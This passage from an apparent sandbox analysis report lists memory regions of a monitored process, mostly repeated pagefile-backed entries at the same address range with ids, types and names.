"pagefile_0x0000000000580000" filename = "" Region: id = 8932 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8933 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8934 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8935 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8936 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8937 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8938 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8939 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8940 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8941 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8942 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8943 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8944 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8945 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8946 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8947 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8948 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8949 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8950 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8951 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8952 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8953 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8954 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8955 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8956 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8957 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8958 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8959 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8960 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 8961 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 8962 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8963 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8964 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8965 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8966 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8967 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8968 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8969 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8970 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8971 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8972 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8973 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8974 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8975 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8976 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8977 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8978 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8979 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8980 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8981 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8982 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8983 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8984 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8985 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8986 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8987 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8988 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8989 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8990 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8991 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8992 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8993 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8994 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8995 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8996 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8997 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8998 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8999 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9000 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9001 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9002 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9003 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9004 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9005 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9006 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9007 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9008 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9009 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9010 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9011 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9012 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9013 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9014 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9015 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9016 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9017 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9018 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9019 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9020 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9021 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9022 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9023 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9024 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9025 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9026 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9027 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9028 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9029 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9030 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9031 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9032 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9033 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9034 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9035 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9036 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9037 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9038 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9039 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9040 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9041 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9042 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9043 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9044 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9045 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9046 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9047 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9048 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9049 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9050 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9051 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9052 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9053 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9057 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9058 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9059 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9060 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9061 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9062 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9063 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9064 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9065 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9066 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9067 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9068 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9069 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9070 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9071 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9072 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9073 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9074 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9075 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9076 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9077 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9078 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9079 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9080 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9081 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9082 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9083 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9084 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9085 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9086 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9087 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9088 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9089 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9090 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9093 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9094 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9095 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9096 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9097 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9098 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9099 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9100 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9101 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9102 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9103 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9104 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9105 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9106 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9107 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9108 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9109 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9110 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9111 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9112 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9113 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9114 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9115 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9116 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9117 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9118 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9119 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9120 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9121 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9122 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9123 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9124 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = 